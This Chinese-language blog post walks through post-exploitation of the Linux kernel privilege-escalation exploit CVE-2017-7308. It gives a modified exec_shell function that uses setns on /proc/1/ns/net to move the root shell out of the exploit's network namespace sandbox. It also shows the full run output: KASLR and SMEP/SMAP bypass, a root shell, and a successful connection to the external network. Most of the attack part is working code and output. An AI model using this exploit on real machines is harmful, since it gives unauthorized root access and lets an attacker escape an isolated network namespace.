MENU

CVE-2017-7308后渗透利用

November 9, 2017 • Security

Paper:https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308

大致思路如下:

与真实网络接口隔离隔离的情况下进行一些网络相关的突破。

获得root权限后从PID 1加入network namespace,需要获得一个文件描述符以加入PID 1的network namespace:

int fd;
fd = open("/proc/1/ns/net", O_RDONLY)

有了一个文件描述符便可以在调用setns函数时使用,第二个参数为我们要加入的namespace:

setns(fd, CLONE_NEWNET);

修改PoC中的exec_shell,提权后触发:

PoC:https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308

void exec_shell() {
        char *shell = "/bin/bash";
        char *args[] = {shell, "-i", NULL};

        int fd;

        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd == -1)
        {
                perror("error opening /proc/1/ns/net");
                exit(EXIT_FAILURE);
        }

        if (setns(fd, CLONE_NEWNET) == -1)
        {
                perror("error calling setns");
                exit(EXIT_FAILURE);
        }
        
        execve(shell, args, NULL);
}

编译并执行

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
fastix@fastix-virtual-machine:~$ ./exploit 
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[.] done, kernel text:   ffffffffb5800000
[.] commit_creds:        ffffffffb58a5cf0
[.] prepare_kernel_cred: ffffffffb58a60e0
[.] native_write_cr4:    ffffffffb5864210
[.] padding heap
[.] done, heap is padded
[.] SMEP & SMAP bypass enabled, turning them off
[.] done, SMEP & SMAP should be off now
[.] executing get root payload 0x55fa39fa7612
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@fastix-virtual-machine:/home/fastix# id
uid=0(root) gid=0(root) groups=0(root)
root@fastix-virtual-machine:/home/fastix# ip link list
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33:  mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff,multicast,up,lower_up>
root@fastix-virtual-machine:/home/fastix# ifconfig 
ens33: flags=4163  mtu 1500
        inet 192.168.1.112  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::5cd:ee6f:92b:ccc6  prefixlen 64  scopeid 0x20
        ether 00:0c:29:98:3b:85  txqueuelen 1000  (Ethernet)
        RX packets 69  bytes 9044 (9.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 85  bytes 9782 (9.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0,broadcast,running,multicast>

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 3329  bytes 206245 (206.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3329  bytes 206245 (206.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@fastix-virtual-machine:/home/fastix# ping www.google.com                                   
PING www.google.com (216.58.202.132) 56(84) bytes of data.
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=1 ttl=50 time=52.7 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=2 ttl=50 time=54.6 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=3 ttl=50 time=51.9 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=4 ttl=50 time=53.7 ms
^C
--- www.google.com ping statistics ---
5 packets transmitted, 4 received, 20% packet loss, time 4008ms
rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms
,loopback,running>,up,lower_up>

获得ens33接口,成功连接外网。

Archives QR Code
QR Code for this page
Tipping QR Code
Leave a Comment